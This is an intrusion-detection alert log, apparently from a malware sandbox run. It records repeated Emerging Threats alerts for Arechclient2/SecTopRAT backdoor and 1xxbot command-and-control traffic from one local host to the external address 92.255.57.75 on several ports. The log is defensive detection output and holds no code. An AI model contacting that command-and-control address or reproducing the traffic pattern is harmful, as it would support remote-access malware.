2024-12-17T08:39:13.998214+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	49864	92.255.57.75	9000	TCP
2024-12-17T08:39:13.998214+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	49864	92.255.57.75	9000	TCP
2024-12-17T08:39:15.559621+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	49866	92.255.57.75	9000	TCP
2024-12-17T08:39:15.559621+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	49866	92.255.57.75	9000	TCP
2024-12-17T08:39:17.497250+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	49872	92.255.57.75	9000	TCP
2024-12-17T08:39:17.497250+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	49872	92.255.57.75	9000	TCP
2024-12-17T08:39:19.064007+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	49879	92.255.57.75	9000	TCP
2024-12-17T08:39:19.064007+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	49879	92.255.57.75	9000	TCP
2024-12-17T08:39:20.620349+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	49880	92.255.57.75	9000	TCP
2024-12-17T08:39:20.620349+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	49880	92.255.57.75	9000	TCP
2024-12-17T08:39:22.182572+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	49886	92.255.57.75	9000	TCP
2024-12-17T08:39:22.182572+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	49886	92.255.57.75	9000	TCP
2024-12-17T08:39:23.745974+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	49892	92.255.57.75	9000	TCP
2024-12-17T08:39:23.745974+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	49892	92.255.57.75	9000	TCP
2024-12-17T08:39:25.308426+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	49898	92.255.57.75	9000	TCP
2024-12-17T08:39:25.308426+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	49898	92.255.57.75	9000	TCP
2024-12-17T08:39:26.870284+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	49899	92.255.57.75	9000	TCP
2024-12-17T08:39:26.870284+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	49899	92.255.57.75	9000	TCP
2024-12-17T08:39:28.586573+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	49905	92.255.57.75	9000	TCP
2024-12-17T08:39:28.586573+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	49905	92.255.57.75	9000	TCP
2024-12-17T08:39:30.149636+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	49911	92.255.57.75	9000	TCP
2024-12-17T08:39:30.149636+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	49911	92.255.57.75	9000	TCP
2024-12-17T08:39:31.696759+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	49917	92.255.57.75	9000	TCP
2024-12-17T08:39:31.696759+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	49917	92.255.57.75	9000	TCP
2024-12-17T08:39:33.323133+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	49918	92.255.57.75	9000	TCP
2024-12-17T08:39:33.323133+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	49918	92.255.57.75	9000	TCP
2024-12-17T08:39:34.883749+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	49924	92.255.57.75	9000	TCP
2024-12-17T08:39:34.883749+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	49924	92.255.57.75	9000	TCP
2024-12-17T08:39:36.444153+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	49930	92.255.57.75	9000	TCP
2024-12-17T08:39:36.444153+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	49930	92.255.57.75	9000	TCP
2024-12-17T08:39:38.001727+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	49931	92.255.57.75	9000	TCP
2024-12-17T08:39:38.001727+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	49931	92.255.57.75	9000	TCP
2024-12-17T08:39:39.587952+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	49937	92.255.57.75	9000	TCP
2024-12-17T08:39:39.587952+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	49937	92.255.57.75	9000	TCP
2024-12-17T08:39:41.137150+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	49943	92.255.57.75	9000	TCP
2024-12-17T08:39:41.137150+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	49943	92.255.57.75	9000	TCP
2024-12-17T08:39:42.702171+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	49949	92.255.57.75	9000	TCP
2024-12-17T08:39:42.702171+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	49949	92.255.57.75	9000	TCP
2024-12-17T08:39:44.262768+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	49950	92.255.57.75	9000	TCP
2024-12-17T08:39:44.262768+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	49950	92.255.57.75	9000	TCP
2024-12-17T08:39:45.820751+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	49956	92.255.57.75	9000	TCP
2024-12-17T08:39:45.820751+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	49956	92.255.57.75	9000	TCP
2024-12-17T08:39:47.372943+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	49962	92.255.57.75	9000	TCP
2024-12-17T08:39:47.372943+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	49962	92.255.57.75	9000	TCP
2024-12-17T08:39:48.933542+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	49964	92.255.57.75	9000	TCP
2024-12-17T08:39:48.933542+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	49964	92.255.57.75	9000	TCP
2024-12-17T08:39:50.496459+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	49969	92.255.57.75	9000	TCP
2024-12-17T08:39:50.496459+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	49969	92.255.57.75	9000	TCP
2024-12-17T08:39:52.057375+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	49975	92.255.57.75	9000	TCP
2024-12-17T08:39:52.057375+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	49975	92.255.57.75	9000	TCP
2024-12-17T08:39:53.620267+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	49981	92.255.57.75	9000	TCP
2024-12-17T08:39:53.620267+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	49981	92.255.57.75	9000	TCP
2024-12-17T08:39:55.184361+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	49982	92.255.57.75	9000	TCP
2024-12-17T08:39:55.184361+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	49982	92.255.57.75	9000	TCP
2024-12-17T08:39:56.746834+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	49988	92.255.57.75	9000	TCP
2024-12-17T08:39:56.746834+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	49988	92.255.57.75	9000	TCP
2024-12-17T08:39:58.032343+0100	2051910	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity	1	192.168.2.11	49995	92.255.57.75	15647	TCP
2024-12-17T08:39:58.385009+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	49994	92.255.57.75	9000	TCP
2024-12-17T08:39:58.385009+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	49994	92.255.57.75	9000	TCP
2024-12-17T08:39:59.233698+0100	2029217	ET MALWARE Arechclient2 Backdoor/SecTopRAT CnC Init	1	92.255.57.75	15647	192.168.2.11	49995	TCP
2024-12-17T08:39:59.950905+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	49997	92.255.57.75	9000	TCP
2024-12-17T08:39:59.950905+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	49997	92.255.57.75	9000	TCP
2024-12-17T08:40:01.513011+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	50002	92.255.57.75	9000	TCP
2024-12-17T08:40:01.513011+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	50002	92.255.57.75	9000	TCP
2024-12-17T08:40:03.075227+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	50008	92.255.57.75	9000	TCP
2024-12-17T08:40:03.075227+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	50008	92.255.57.75	9000	TCP
2024-12-17T08:40:04.635475+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	50014	92.255.57.75	9000	TCP
2024-12-17T08:40:04.635475+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	50014	92.255.57.75	9000	TCP
2024-12-17T08:40:06.203953+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	50016	92.255.57.75	9000	TCP
2024-12-17T08:40:06.203953+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	50016	92.255.57.75	9000	TCP
2024-12-17T08:40:07.766361+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	50021	92.255.57.75	9000	TCP
2024-12-17T08:40:07.766361+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	50021	92.255.57.75	9000	TCP
2024-12-17T08:40:09.327298+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	50027	92.255.57.75	9000	TCP
2024-12-17T08:40:09.327298+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	50027	92.255.57.75	9000	TCP
2024-12-17T08:40:09.988167+0100	2051910	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity	1	192.168.2.11	50034	92.255.57.75	15647	TCP
2024-12-17T08:40:10.887777+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	50029	92.255.57.75	9000	TCP
2024-12-17T08:40:10.887777+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	50029	92.255.57.75	9000	TCP
2024-12-17T08:40:11.200138+0100	2029217	ET MALWARE Arechclient2 Backdoor/SecTopRAT CnC Init	1	92.255.57.75	15647	192.168.2.11	50034	TCP
2024-12-17T08:40:12.447907+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	50035	92.255.57.75	9000	TCP
2024-12-17T08:40:12.447907+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	50035	92.255.57.75	9000	TCP
2024-12-17T08:40:14.016690+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	50041	92.255.57.75	9000	TCP
2024-12-17T08:40:14.016690+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	50041	92.255.57.75	9000	TCP
2024-12-17T08:40:15.573240+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	50047	92.255.57.75	9000	TCP
2024-12-17T08:40:15.573240+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	50047	92.255.57.75	9000	TCP
2024-12-17T08:40:17.140306+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	50048	92.255.57.75	9000	TCP
2024-12-17T08:40:17.140306+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	50048	92.255.57.75	9000	TCP
2024-12-17T08:40:18.700637+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	50049	92.255.57.75	9000	TCP
2024-12-17T08:40:18.700637+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	50049	92.255.57.75	9000	TCP
2024-12-17T08:40:20.261661+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	50050	92.255.57.75	9000	TCP
2024-12-17T08:40:20.261661+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	50050	92.255.57.75	9000	TCP
2024-12-17T08:40:21.824581+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	50051	92.255.57.75	9000	TCP
2024-12-17T08:40:21.824581+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	50051	92.255.57.75	9000	TCP
2024-12-17T08:40:23.394151+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	50052	92.255.57.75	9000	TCP
2024-12-17T08:40:23.394151+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	50052	92.255.57.75	9000	TCP
2024-12-17T08:40:24.956353+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	50053	92.255.57.75	9000	TCP
2024-12-17T08:40:24.956353+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	50053	92.255.57.75	9000	TCP
2024-12-17T08:40:26.509896+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	50054	92.255.57.75	9000	TCP
2024-12-17T08:40:26.509896+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	50054	92.255.57.75	9000	TCP
2024-12-17T08:40:28.063631+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	50055	92.255.57.75	9000	TCP
2024-12-17T08:40:28.063631+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	50055	92.255.57.75	9000	TCP
2024-12-17T08:40:29.622720+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	50056	92.255.57.75	9000	TCP
2024-12-17T08:40:29.622720+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	50056	92.255.57.75	9000	TCP
2024-12-17T08:40:31.209899+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	50057	92.255.57.75	9000	TCP
2024-12-17T08:40:31.209899+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	50057	92.255.57.75	9000	TCP
2024-12-17T08:40:32.788179+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	50058	92.255.57.75	9000	TCP
2024-12-17T08:40:32.788179+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	50058	92.255.57.75	9000	TCP
2024-12-17T08:40:34.356389+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	50059	92.255.57.75	9000	TCP
2024-12-17T08:40:34.356389+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	50059	92.255.57.75	9000	TCP
2024-12-17T08:40:35.953959+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	50060	92.255.57.75	9000	TCP
2024-12-17T08:40:35.953959+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	50060	92.255.57.75	9000	TCP
2024-12-17T08:40:37.511141+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	50061	92.255.57.75	9000	TCP
2024-12-17T08:40:37.511141+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	50061	92.255.57.75	9000	TCP
2024-12-17T08:40:37.769348+0100	2028984	ET MALWARE Win32/1xxbot CnC Checkin	1	192.168.2.11	50062	92.255.57.75	228	TCP
2024-12-17T08:40:39.071988+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	50063	92.255.57.75	9000	TCP
2024-12-17T08:40:39.071988+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	50063	92.255.57.75	9000	TCP
2024-12-17T08:40:39.171752+0100	2028984	ET MALWARE Win32/1xxbot CnC Checkin	1	192.168.2.11	50064	92.255.57.75	80	TCP
2024-12-17T08:40:40.626669+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	50065	92.255.57.75	9000	TCP
2024-12-17T08:40:40.626669+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	50065	92.255.57.75	9000	TCP
2024-12-17T08:40:42.180961+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	50066	92.255.57.75	9000	TCP
2024-12-17T08:40:42.180961+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	50066	92.255.57.75	9000	TCP
2024-12-17T08:40:43.729983+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	50067	92.255.57.75	9000	TCP
2024-12-17T08:40:43.729983+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	50067	92.255.57.75	9000	TCP
2024-12-17T08:40:45.294166+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	50068	92.255.57.75	9000	TCP
2024-12-17T08:40:45.294166+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	50068	92.255.57.75	9000	TCP
2024-12-17T08:40:46.855979+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	50069	92.255.57.75	9000	TCP
2024-12-17T08:40:46.855979+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	50069	92.255.57.75	9000	TCP
2024-12-17T08:40:48.416564+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	50070	92.255.57.75	9000	TCP
2024-12-17T08:40:48.416564+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	50070	92.255.57.75	9000	TCP
2024-12-17T08:40:49.995213+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	50071	92.255.57.75	9000	TCP
2024-12-17T08:40:49.995213+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	50071	92.255.57.75	9000	TCP
2024-12-17T08:40:51.560552+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	50072	92.255.57.75	9000	TCP
2024-12-17T08:40:51.560552+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	50072	92.255.57.75	9000	TCP
2024-12-17T08:40:53.129769+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	50073	92.255.57.75	9000	TCP
2024-12-17T08:40:53.129769+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	50073	92.255.57.75	9000	TCP
2024-12-17T08:40:54.686702+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	50074	92.255.57.75	9000	TCP
2024-12-17T08:40:54.686702+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	50074	92.255.57.75	9000	TCP
2024-12-17T08:40:56.242629+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	50075	92.255.57.75	9000	TCP
2024-12-17T08:40:56.242629+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	50075	92.255.57.75	9000	TCP
2024-12-17T08:40:57.876736+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	50076	92.255.57.75	9000	TCP
2024-12-17T08:40:57.876736+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	50076	92.255.57.75	9000	TCP
2024-12-17T08:40:59.431179+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	50077	92.255.57.75	9000	TCP
2024-12-17T08:40:59.431179+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	50077	92.255.57.75	9000	TCP
2024-12-17T08:41:01.008999+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	50078	92.255.57.75	9000	TCP
2024-12-17T08:41:01.008999+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	50078	92.255.57.75	9000	TCP
2024-12-17T08:41:02.588341+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	50079	92.255.57.75	9000	TCP
2024-12-17T08:41:02.588341+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	50079	92.255.57.75	9000	TCP
2024-12-17T08:41:04.369272+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	50080	92.255.57.75	9000	TCP
2024-12-17T08:41:04.369272+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	50080	92.255.57.75	9000	TCP
2024-12-17T08:41:05.928916+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	50081	92.255.57.75	9000	TCP
2024-12-17T08:41:05.928916+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	50081	92.255.57.75	9000	TCP
2024-12-17T08:41:07.478669+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	50082	92.255.57.75	9000	TCP
2024-12-17T08:41:07.478669+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	50082	92.255.57.75	9000	TCP
2024-12-17T08:41:09.030420+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	50083	92.255.57.75	9000	TCP
2024-12-17T08:41:09.030420+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	50083	92.255.57.75	9000	TCP
2024-12-17T08:41:10.591098+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	50084	92.255.57.75	9000	TCP
2024-12-17T08:41:10.591098+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	50084	92.255.57.75	9000	TCP
2024-12-17T08:41:12.148606+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	50085	92.255.57.75	9000	TCP
2024-12-17T08:41:12.148606+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	50085	92.255.57.75	9000	TCP
2024-12-17T08:41:13.698083+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	50086	92.255.57.75	9000	TCP
2024-12-17T08:41:13.698083+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	50086	92.255.57.75	9000	TCP
2024-12-17T08:41:15.266836+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	50087	92.255.57.75	9000	TCP
2024-12-17T08:41:15.266836+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	50087	92.255.57.75	9000	TCP
2024-12-17T08:41:16.827334+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	50088	92.255.57.75	9000	TCP
2024-12-17T08:41:16.827334+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	50088	92.255.57.75	9000	TCP
2024-12-17T08:41:18.422781+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	50089	92.255.57.75	9000	TCP
2024-12-17T08:41:18.422781+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	50089	92.255.57.75	9000	TCP
2024-12-17T08:41:19.978640+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	50090	92.255.57.75	9000	TCP
2024-12-17T08:41:19.978640+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	50090	92.255.57.75	9000	TCP
2024-12-17T08:41:21.555765+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	50091	92.255.57.75	9000	TCP
2024-12-17T08:41:21.555765+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	50091	92.255.57.75	9000	TCP
2024-12-17T08:41:23.200006+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	50092	92.255.57.75	9000	TCP
2024-12-17T08:41:23.200006+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	50092	92.255.57.75	9000	TCP
2024-12-17T08:41:24.759180+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	50093	92.255.57.75	9000	TCP
2024-12-17T08:41:24.759180+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	50093	92.255.57.75	9000	TCP
2024-12-17T08:41:25.564492+0100	2051910	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity	1	192.168.2.11	50095	92.255.57.75	15647	TCP
2024-12-17T08:41:26.311298+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	50094	92.255.57.75	9000	TCP
2024-12-17T08:41:26.311298+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	50094	92.255.57.75	9000	TCP
2024-12-17T08:41:26.751766+0100	2029217	ET MALWARE Arechclient2 Backdoor/SecTopRAT CnC Init	1	92.255.57.75	15647	192.168.2.11	50095	TCP
2024-12-17T08:41:27.873593+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	50096	92.255.57.75	9000	TCP
2024-12-17T08:41:27.873593+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	50096	92.255.57.75	9000	TCP
